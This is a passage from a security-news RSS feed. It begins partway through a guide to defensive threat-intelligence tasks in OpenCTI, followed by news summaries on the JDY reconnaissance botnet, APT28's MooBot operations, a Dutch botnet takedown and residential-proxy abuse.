indicators.</p><pre>Data → Indicators<br>Filter: Score &gt; 70, Type = IPv4-Addr, Valid until &gt; today<br>Export → CSV or STIX</pre><p>Or use the built-in <strong>TAXII 2.1 server</strong> to push directly to your SIEM:</p><pre>Settings → Taxii Server → Create collection "High confidence IOCs"<br>Configure your SIEM to poll: http://localhost:8080/taxii2/</pre><h4>Example 7 — Map your detection coverage against ATT&amp;CK</h4><p>You want to know which techniques you detect vs which you’re blind to.</p><pre>Technics → Attack Patterns<br>Filter by: used by (Lazarus Group)</pre><p>Cross-reference the list with your SIEM detection rules. Techniques with no detection rule = gap in coverage.</p><p>Export the filtered list as CSV and import into ATT&amp;CK Navigator for a visual heatmap of covered vs uncovered techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mPwgsMfkEtXK1y1rnlj0Hw.png"></figure><h4>Example 8 — Pivot from malware to infrastructure</h4><p>You found a Ryuk ransomware sample (SHA256 hash).</p><pre>Search → paste the SHA256</pre><p>From the malware object, pivot to:</p><ul><li><strong>Related indicators</strong> → domains and IPs used for C2</li><li><strong>Used by</strong> → Wizard Spider (threat actor)</li><li><strong>Campaigns</strong> → which ransomware campaigns used this variant</li><li><strong>Techniques</strong> → T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery)</li></ul><p>Each pivot is one click in the graph view.</p><h4>Example 9 — Share intelligence with a partner org</h4><p>You want to share a report with a partner but strip out RED-marked internal data.</p><pre>Open the report → Actions → Share<br>Select TLP level: TLP:AMBER (only partner can see it)</pre><p>Or use <strong>Workspaces → Sharing groups</strong> to create a federated share with another OpenCTI instance. All objects above RED are automatically excluded from the export.</p><h4>Example 10 — Build a custom dashboard for your sector</h4><p>Your org is in Finance. You want a live dashboard showing threats to your sector.</p><pre>Home → Dashboards → Create dashboard "Finance Threat Landscape"<br>Add widgets:<br>  - "Threat actors targeting Finance" (bar chart)<br>  - "Most used techniques against Finance" (ATT&amp;CK heatmap)<br>  - "New IOCs last 7 days" (timeline)<br>  - "Active campaigns" (list)<br>  - "CVEs affecting banking software" (table)</pre><p>Each widget auto-updates as new data arrives from connectors.</p><h4>If you like this research, <a href="https://www.paypal.com/donate/?business=W3XDKS7J9XTCG&amp;no_recurring=0&amp;item_name=Buy+me+a+coffee+%28PayPal%29+%E2%80%94+Keep+the+lab+running&amp;currency_code=USD">buy me a coffee (PayPal) — Keep the lab running</a></h4><h3>Follow for practical cybersecurity research</h3><p>If you’re interested in <strong>Offensive security,</strong> <strong>AI security, real-world attack simulations, CTI, and detection engineering</strong> — this is exactly what I focus on.</p><h4>Stay connected:</h4><p>→ <strong>Subscribe on Medium:</strong> <a href="https://medium.com/@1200km">medium.com/@1200km</a><br>→ <strong>Connect on LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">andrey-pautov</a><br>→ <strong>GitHub — tools &amp; labs:</strong> <a href="https://github.com/anpa1200">github.com/anpa1200</a><br>→ <strong>Contact:</strong> <a href="mailto:1200km@gmail.com">1200km@gmail.com</a></p><h4>Andrey Pautov</h4><p>Follow My Work</p><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><p>Portfolio / Knowledge Base: <a href="https://1200km.com/">https://1200km.com/</a><br>Medium: <a href="https://medium.com/@1200km">https://medium.com/@1200km</a><br>GitHub: <a href="https://github.com/anpa1200">https://github.com/anpa1200</a><br>LinkedIn: <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></p><p>Andrey Pautov</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=057c9b4b9394" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Authorities Dismantle Massive Botnet Network Linked to 17 Million Compromised Devices]]></title>
<description><![CDATA[  Dutch authorities have shut down what is believed to be one of the largest botnet operations ever uncovered, disrupting a cybercrime network that compromised more than 17 million internet-connected devices globally. The affected devices reportedly included computers, smartphones, tablets,…
Read...]]></description>
<link>https://tsecurity.de/de/3598211/it-security-nachrichten/dutch-authorities-dismantle-massive-botnet-network-linked-to-17-million-compromised-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598211/it-security-nachrichten/dutch-authorities-dismantle-massive-botnet-network-linked-to-17-million-compromised-devices/</guid>
<pubDate>Mon, 15 Jun 2026 08:23:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Dutch authorities have shut down what is believed to be one of the largest botnet operations ever uncovered, disrupting a cybercrime network that compromised more than 17 million internet-connected devices globally. The affected devices reportedly included computers, smartphones, tablets,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/dutch-authorities-dismantle-massive-botnet-network-linked-to-17-million-compromised-devices/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/dutch-authorities-dismantle-massive-botnet-network-linked-to-17-million-compromised-devices/">Dutch Authorities Dismantle Massive Botnet Network Linked to 17 Million Compromised Devices</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GRU-Linked APT28 Uses MooBot Botnet and Compromised EdgeRouters for Cyber Operations]]></title>
<description><![CDATA[A notable operational pivot by the GRU-linked intrusion set APT28 (aka Fancy Bear, Sofacy, Forest Blizzard, Pawn Storm) that combines the MooBot botnet and compromised EdgeRouters to enable resilient cyber operations. This shift amplifies APT28’s long-standing focus on NATO, Ukrainian…
Read more ...]]></description>
<link>https://tsecurity.de/de/3593567/it-security-nachrichten/gru-linked-apt28-uses-moobot-botnet-and-compromised-edgerouters-for-cyber-operations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593567/it-security-nachrichten/gru-linked-apt28-uses-moobot-botnet-and-compromised-edgerouters-for-cyber-operations/</guid>
<pubDate>Fri, 12 Jun 2026 15:19:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A notable operational pivot by the GRU-linked intrusion set APT28 (aka Fancy Bear, Sofacy, Forest Blizzard, Pawn Storm) that combines the MooBot botnet and compromised EdgeRouters to enable resilient cyber operations. This shift amplifies APT28’s long-standing focus on NATO, Ukrainian…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/gru-linked-apt28-uses-moobot-botnet-and-compromised-edgerouters-for-cyber-operations/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/gru-linked-apt28-uses-moobot-botnet-and-compromised-edgerouters-for-cyber-operations/">GRU-Linked APT28 Uses MooBot Botnet and Compromised EdgeRouters for Cyber Operations</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GRU-Linked APT28 Uses MooBot Botnet and Compromised EdgeRouters for Cyber Operations]]></title>
<description><![CDATA[A notable operational pivot by the GRU-linked intrusion set APT28 (aka Fancy Bear, Sofacy, Forest Blizzard, Pawn Storm) that combines the MooBot botnet and compromised EdgeRouters to enable resilient cyber operations. This shift amplifies APT28’s long-standing focus on NATO, Ukrainian and critica...]]></description>
<link>https://tsecurity.de/de/3593461/it-security-nachrichten/gru-linked-apt28-uses-moobot-botnet-and-compromised-edgerouters-for-cyber-operations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593461/it-security-nachrichten/gru-linked-apt28-uses-moobot-botnet-and-compromised-edgerouters-for-cyber-operations/</guid>
<pubDate>Fri, 12 Jun 2026 14:41:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A notable operational pivot by the GRU-linked intrusion set APT28 (aka Fancy Bear, Sofacy, Forest Blizzard, Pawn Storm) that combines the MooBot botnet and compromised EdgeRouters to enable resilient cyber operations. This shift amplifies APT28’s long-standing focus on NATO, Ukrainian and critical-infrastructure targets by moving key capabilities from traditional cloud VPS and commodity hosting into […]</p>
<p>The post <a href="https://gbhackers.com/gru-linked-apt28-uses-moobot-botnet/">GRU-Linked APT28 Uses MooBot Botnet and Compromised EdgeRouters for Cyber Operations</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[JDY-Botnet wächst auf über 1.500 IoT- und SOHO-Geräte für KI-ähnliche Zielaufklärung]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor einer erneuten Ausbreitung des JDY-Botnetzes: Es nutzt inzwischen über 1.500 SOHO- und IoT-Geräte, um offen einsehbare Dienste automatisiert zu entdecken und systematisch zu fingerprinten. Der Ansatz liefert strukturierte Aufklärungsdaten als ...]]></description>
<link>https://tsecurity.de/de/3591233/it-security-nachrichten/jdy-botnet-waechst-auf-ueber-1500-iot-und-soho-geraete-fuer-ki-aehnliche-zielaufklaerung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591233/it-security-nachrichten/jdy-botnet-waechst-auf-ueber-1500-iot-und-soho-geraete-fuer-ki-aehnliche-zielaufklaerung/</guid>
<pubDate>Thu, 11 Jun 2026 18:20:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-1500.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-1500.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-1500-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-1500-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-1500-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-1500-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-1500-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor einer erneuten Ausbreitung des JDY-Botnetzes: Es nutzt inzwischen über 1.500 SOHO- und IoT-Geräte, um offen einsehbare Dienste automatisiert zu entdecken und systematisch zu fingerprinten. Der Ansatz liefert strukturierte Aufklärungsdaten als Vorstufe für spätere Zieldefinition und Ausnutzung. Besonders kritisch: Das Botnet passt seine Scan-Methodik an Privilegien und verfügbare Protokolle […]</p>
<div><a href="https://www.it-boltwise.de/jdy-botnet-waechst-auf-ueber-1-500-iot-und-soho-geraete-fuer-ki-aehnliche-zielaufklaerung.html">... den vollständigen Artikel <strong>»JDY-Botnet wächst auf über 1.500 IoT- und SOHO-Geräte für KI-ähnliche Zielaufklärung«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/jdy-botnet-waechst-auf-ueber-1-500-iot-und-soho-geraete-fuer-ki-aehnliche-zielaufklaerung.html">JDY-Botnet wächst auf über 1.500 IoT- und SOHO-Geräte für KI-ähnliche Zielaufklärung</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security experts sound alarm over 'expanded' China-linked botnet used to target US critical infrastructure and military assets]]></title>
<description><![CDATA[The China-linked botnet highlights risk of leaving routers and IoT devices unpatched]]></description>
<link>https://tsecurity.de/de/3591130/it-security-nachrichten/security-experts-sound-alarm-over-expanded-china-linked-botnet-used-to-target-us-critical-infrastructure-and-military-assets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591130/it-security-nachrichten/security-experts-sound-alarm-over-expanded-china-linked-botnet-used-to-target-us-critical-infrastructure-and-military-assets/</guid>
<pubDate>Thu, 11 Jun 2026 17:53:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The China-linked botnet highlights risk of leaving routers and IoT devices unpatched]]></content:encoded>
</item>
<item>
<title><![CDATA[JDY-Botnet wächst auf 1.500+ Geräte: Zentrale KI-gestützte Reconnaissance für Edge-Schwachstellen]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor einer deutlichen Ausweitung des JDY-Botnets auf über 1.500 SOHO- und IoT-Geräte. Das Netzwerk fungiert als zentral gesteuerter Scanner, der Dienste identifiziert, systematisch profiliert und verwertbare Reconnaissance-Daten liefert. Besonders ...]]></description>
<link>https://tsecurity.de/de/3590757/it-security-nachrichten/jdy-botnet-waechst-auf-1500-geraete-zentrale-ki-gestuetzte-reconnaissance-fuer-edge-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590757/it-security-nachrichten/jdy-botnet-waechst-auf-1500-geraete-zentrale-ki-gestuetzte-reconnaissance-fuer-edge-schwachstellen/</guid>
<pubDate>Thu, 11 Jun 2026 15:38:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-soho-iot.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-soho-iot.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-soho-iot-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-soho-iot-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-soho-iot-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-soho-iot-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-jdy-botnet-reconnaissance-soho-iot-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor einer deutlichen Ausweitung des JDY-Botnets auf über 1.500 SOHO- und IoT-Geräte. Das Netzwerk fungiert als zentral gesteuerter Scanner, der Dienste identifiziert, systematisch profiliert und verwertbare Reconnaissance-Daten liefert. Besonders relevant ist die Umgehung klassischer IP-basierter Schutzmechanismen, da die Erkennung über viele Adressen und Standorte verteilt wird. Damit wird JDY […]</p>
<div><a href="https://www.it-boltwise.de/jdy-botnet-waechst-auf-1-500-geraete-zentrale-ki-gestuetzte-reconnaissance-fuer-edge-schwachstellen.html">... den vollständigen Artikel <strong>»JDY-Botnet wächst auf 1.500+ Geräte: Zentrale KI-gestützte Reconnaissance für Edge-Schwachstellen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/jdy-botnet-waechst-auf-1-500-geraete-zentrale-ki-gestuetzte-reconnaissance-fuer-edge-schwachstellen.html">JDY-Botnet wächst auf 1.500+ Geräte: Zentrale KI-gestützte Reconnaissance für Edge-Schwachstellen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-linked recon botnet outpaces enterprise defenses]]></title>
<description><![CDATA[A botnet made up of compromised small office and Internet of Things devices has grown into a larger reconnaissance network capable of rapidly identifying vulnerable internet-facing systems after public vulnerability disclosures, researchers said.



The botnet, tracked by Lumen’s Black Lotus Labs...]]></description>
<link>https://tsecurity.de/de/3590095/it-security-nachrichten/china-linked-recon-botnet-outpaces-enterprise-defenses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590095/it-security-nachrichten/china-linked-recon-botnet-outpaces-enterprise-defenses/</guid>
<pubDate>Thu, 11 Jun 2026 12:08:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A botnet made up of compromised small office and Internet of Things devices has grown into a larger reconnaissance network capable of rapidly identifying vulnerable internet-facing systems after public vulnerability disclosures, researchers said.</p>



<p>The botnet, tracked by <a href="https://www.lumen.com/blog/en-us/expanded-jdy-iot-and-soho-botnet-enables-rapid-vulnerability-exploitation">Lumen’s Black Lotus</a><a href="https://www.lumen.com/blog/en-us/expanded-jdy-iot-and-soho-botnet-enables-rapid-vulnerability-exploitation" target="_blank" rel="noreferrer noopener"> </a><a href="https://www.lumen.com/blog/en-us/expanded-jdy-iot-and-soho-botnet-enables-rapid-vulnerability-exploitation">Labs</a> as JDY, now comprises more than 1,500 compromised small office and home office, or SOHO, and IoT devices, and is being used to “discover, fingerprint and continuously map exposed services at scale.”</p>



<p>Lumen said the activity is linked to Chinese <a href="https://www.csoonline.com/article/4140841/state-affiliated-hackers-set-up-for-critical-ot-attacks-that-operators-may-not-detect.html">nation-state-backed actors</a>, including Volt Typhoon. The findings point to a growing challenge for enterprise security teams. Many <a href="https://www.csoonline.com/article/4128748/cisa-gives-federal-agencies-18-months-to-purge-unsupported-edge-devices.html">enterprise edge systems</a> remain outside traditional endpoint monitoring, giving adversaries room to move quickly from vulnerability disclosure to targeted reconnaissance.</p>



<p>Lumen added that JDY’s distributed infrastructure can also help operators evade geofencing and other IP-based defenses because the activity may appear to come from legitimate residential or small-business internet traffic.</p>



<p>JDY undermines several defensive assumptions that many enterprises still rely on, according to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005665">Sakshi Grover</a>, senior research manager for IDC Asia Pacific Cybersecurity Services. </p>



<p>Geofencing and IP reputation controls have limited value when used in isolation, Grover said, while static blocklists are structurally weak against botnets that continuously rotate compromised infrastructure. JDY also exposes a broader visibility gap around edge devices, which are often difficult for enterprises to monitor with the same rigor as endpoints and cloud workloads.</p>



<h2 class="wp-block-heading">Reconnaissance moves closer to attack</h2>



<p>Analysts said that CISOs should not dismiss JDY as just another botnet.</p>



<p>“The reported JDY activity shows a clear focus on discovering, fingerprinting, and continuously mapping exposed services at scale, including shortly after public vulnerability disclosures,” Grover said. “That points to a more industrialized model of pre-exploitation reconnaissance, where compromised edge devices are used not merely for disruption or commodity abuse, but to generate timely targeting intelligence for follow-on operations.”</p>



<p>That means the compromised SOHO and IoT devices may not be the final target. Instead, they provide the scanning layer used to identify exposed enterprise infrastructure, including routers, firewalls, VPNs, cameras, and other internet-facing systems.</p>



<p><a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, a cybersecurity researcher, said CISOs should treat JDY as evidence of a shift in how reconnaissance is being operationalized.</p>



<p>“If JDY is sitting in your risk register under ‘routine botnet management’, your defensive playbook will fail before it starts,” Datta said. “JDY isn’t designed to DDoS anyone, steal credentials, or mine cryptocurrency. It is a centrally controlled, high-performance scanning engine.”</p>



<h2 class="wp-block-heading">Patch timelines come under pressure</h2>



<p>The scanning activity also raises questions about whether conventional vulnerability management timelines are still workable for perimeter systems exposed to the internet.</p>



<p>“Traditional SLA-driven patching is no longer defensible for perimeter devices,” Datta said.</p>



<p>The size of the botnet matters less than the speed of its targeting cycle, according to <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “Fifteen hundred devices that find the right vulnerable systems within hours are worth more than a hundred thousand generating noise,” Gogia said. “Exploitation no longer begins when malicious code arrives. It begins when exposure is discovered.”</p>



<p>The concern is that JDY may already have collected much of the information attackers need before a new vulnerability is disclosed. Datta said the botnet’s reconnaissance can include IP addresses, port configurations, protocol information, service banners, TLS versions, certificate metadata, and associated domains.</p>



<p>That gives operators a head start when a critical flaw becomes public. Lumen said Black Lotus Labs observed a selective increase in scans of Fortinet equipment shortly after the disclosure of CVE-2026-35616, indicating the ability and intent to identify vulnerable devices before patches are widely applied.</p>



<p>For CISOs, Datta said, the response requires pre-approved playbooks for perimeter devices, including accelerated patching, access control list changes, temporary disabling of exposed features, and lockdown of management interfaces.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Use Residential Proxies Networks to Evade Detection]]></title>
<description><![CDATA[The impact of residential proxies across our customer base by compiling billions of DNS resolutions and the associated network telemetry. The Kimwolf Botnet inside our enterprise customer networks.  Follow‑up analysis of billions of DNS resolutions across Infoblox Threat Defense Cloud customers r...]]></description>
<link>https://tsecurity.de/de/3590085/it-security-nachrichten/hackers-use-residential-proxies-networks-to-evade-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590085/it-security-nachrichten/hackers-use-residential-proxies-networks-to-evade-detection/</guid>
<pubDate>Thu, 11 Jun 2026 12:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The impact of residential proxies across our customer base by compiling billions of DNS resolutions and the associated network telemetry. The Kimwolf Botnet inside our enterprise customer networks.  Follow‑up analysis of billions of DNS resolutions across Infoblox Threat Defense Cloud customers reveals a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-use-residential-proxies-networks-to-evade-detection/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-use-residential-proxies-networks-to-evade-detection/">Hackers Use Residential Proxies Networks to Evade Detection</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-Linked JDY Botnet Uses 1,500+ SOHO and IoT Devices for Rapid Vulnerability Exploitation]]></title>
<description><![CDATA[A China-linked network of compromised routers and smart devices has grown into one of the most capable reconnaissance tools tied to a nation-state threat group. Researchers have identified a major resurgence of a botnet known as JDY, which now controls more than 1,500 small office and home office...]]></description>
<link>https://tsecurity.de/de/3590018/it-security-nachrichten/china-linked-jdy-botnet-uses-1500-soho-and-iot-devices-for-rapid-vulnerability-exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590018/it-security-nachrichten/china-linked-jdy-botnet-uses-1500-soho-and-iot-devices-for-rapid-vulnerability-exploitation/</guid>
<pubDate>Thu, 11 Jun 2026 11:37:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A China-linked network of compromised routers and smart devices has grown into one of the most capable reconnaissance tools tied to a nation-state threat group. Researchers have identified a major resurgence of a botnet known as JDY, which now controls more than 1,500 small office and home office (SOHO) and Internet of Things (IoT) devices […]</p>
<p>The post <a href="https://cybersecuritynews.com/china-linked-jdy-botnet-uses-1500-soho-and-iot-devices/">China-Linked JDY Botnet Uses 1,500+ SOHO and IoT Devices for Rapid Vulnerability Exploitation</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-Linked JDY Botnet Uses 1,500+ SOHO and IoT Devices for Rapid Vulnerability Exploitation]]></title>
<description><![CDATA[A China-linked network of compromised routers and smart devices has grown into one of the most capable reconnaissance tools tied to a nation-state threat group. Researchers have identified a major resurgence of a botnet known as JDY, which now controls…
Read more →
The post China-Linked JDY Botne...]]></description>
<link>https://tsecurity.de/de/3590013/it-security-nachrichten/china-linked-jdy-botnet-uses-1500-soho-and-iot-devices-for-rapid-vulnerability-exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590013/it-security-nachrichten/china-linked-jdy-botnet-uses-1500-soho-and-iot-devices-for-rapid-vulnerability-exploitation/</guid>
<pubDate>Thu, 11 Jun 2026 11:37:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A China-linked network of compromised routers and smart devices has grown into one of the most capable reconnaissance tools tied to a nation-state threat group. Researchers have identified a major resurgence of a botnet known as JDY, which now controls…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/china-linked-jdy-botnet-uses-1500-soho-and-iot-devices-for-rapid-vulnerability-exploitation/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/china-linked-jdy-botnet-uses-1500-soho-and-iot-devices-for-rapid-vulnerability-exploitation/">China-Linked JDY Botnet Uses 1,500+ SOHO and IoT Devices for Rapid Vulnerability Exploitation</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Use Residential Proxies Networks to Evade Detection]]></title>
<description><![CDATA[The impact of residential proxies across our customer base by compiling billions of DNS resolutions and the associated network telemetry. The Kimwolf Botnet inside our enterprise customer networks.  Follow‑up analysis of billions of DNS resolutions across Infoblox Threat Defense Cloud customers r...]]></description>
<link>https://tsecurity.de/de/3590010/it-security-nachrichten/hackers-use-residential-proxies-networks-to-evade-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590010/it-security-nachrichten/hackers-use-residential-proxies-networks-to-evade-detection/</guid>
<pubDate>Thu, 11 Jun 2026 11:37:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The impact of residential proxies across our customer base by compiling billions of DNS resolutions and the associated network telemetry. The Kimwolf Botnet inside our enterprise customer networks.  Follow‑up analysis of billions of DNS resolutions across Infoblox Threat Defense Cloud customers reveals a more systemic problem: in 2026 more than 65% of customers queried domains associated with residential […]</p>
<p>The post <a href="https://gbhackers.com/residential-proxies-networks-abused/">Hackers Use Residential Proxies Networks to Evade Detection</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[JDY Botnet Evolves After KV Takedown, Targets Military Networks]]></title>
<description><![CDATA[JDY botnet scans SOHO/IoT devices globally to map services and targets, especially US military networks. Lumen’s Black Lotus Labs reported the resurgence of the JDY botnet, a covert reconnaissance network tied to Chinese state-sponsored hacking groups including Volt Typhoon. The…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3589867/it-security-nachrichten/jdy-botnet-evolves-after-kv-takedown-targets-military-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589867/it-security-nachrichten/jdy-botnet-evolves-after-kv-takedown-targets-military-networks/</guid>
<pubDate>Thu, 11 Jun 2026 10:38:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>JDY botnet scans SOHO/IoT devices globally to map services and targets, especially US military networks. Lumen’s Black Lotus Labs reported the resurgence of the JDY botnet, a covert reconnaissance network tied to Chinese state-sponsored hacking groups including Volt Typhoon. The…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/jdy-botnet-evolves-after-kv-takedown-targets-military-networks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/jdy-botnet-evolves-after-kv-takedown-targets-military-networks/">JDY Botnet Evolves After KV Takedown, Targets Military Networks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[JDY Botnet Evolves After KV Takedown, Targets Military Networks]]></title>
<description><![CDATA[JDY botnet scans SOHO/IoT devices globally to map services and targets, especially US military networks. Lumen’s Black Lotus Labs reported the resurgence of the JDY botnet, a covert reconnaissance network tied to Chinese state-sponsored hacking groups including Volt Typhoon. The network was first...]]></description>
<link>https://tsecurity.de/de/3589842/hacking/jdy-botnet-evolves-after-kv-takedown-targets-military-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589842/hacking/jdy-botnet-evolves-after-kv-takedown-targets-military-networks/</guid>
<pubDate>Thu, 11 Jun 2026 10:23:39 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[JDY botnet scans SOHO/IoT devices globally to map services and targets, especially US military networks. Lumen’s Black Lotus Labs reported the resurgence of the JDY botnet, a covert reconnaissance network tied to Chinese state-sponsored hacking groups including Volt Typhoon. The network was first spotted in late 2023 as a cluster inside KV-botnet. The U.S. government […]]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-11 09h : 4 posts]]></title>
<description><![CDATA[4 posts were published in the last hour 6:34 : China-Linked JDY Botnet Hijacks 1,500+ IoT Devices for Rapid Exploits 6:34 : GitLab Patches Multiple Vulnerabilities Allowing Account Takeover 6:34 : Hackers Exploit AWS CloudTrail and Google Cloud Logging to…
Read more →
The post IT Security News Ho...]]></description>
<link>https://tsecurity.de/de/3589710/it-security-nachrichten/it-security-news-hourly-summary-2026-06-11-09h-4-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589710/it-security-nachrichten/it-security-news-hourly-summary-2026-06-11-09h-4-posts/</guid>
